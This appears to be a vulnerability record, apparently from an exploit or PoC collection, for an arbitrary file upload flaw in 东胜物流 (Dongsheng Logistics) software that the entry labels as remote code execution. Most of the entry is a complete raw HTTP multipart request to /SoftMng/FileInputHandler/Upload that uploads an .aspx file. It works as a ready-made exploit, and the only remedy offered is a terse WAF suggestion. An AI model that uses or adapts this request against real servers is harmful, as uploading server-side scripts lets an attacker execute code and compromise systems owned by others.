vendor = "东胜物流"
name = "东胜物流 /SoftMng/FileInputHandler/Upload 任意文件上传"
type = "RCE"
version = "未知"
path = "/SoftMng/FileInputHandler/Upload"
detail = "POST /SoftMng/FileInputHandler/Upload HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive Content-Length: 211 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 ------WebKitFormBoundaryFfJZ4PlAZBixjELj Content-Disposition: form-data; name=\"file\"; filename=\"QAZWSX.aspx\" Content-Type: application/octet-stream 123456 ------WebKitFormBoundaryFfJZ4PlAZBixjELj--"
fix = "使用WAF封禁该地址"
date = "0711"
label = "1day"
verifier = "AdySec"
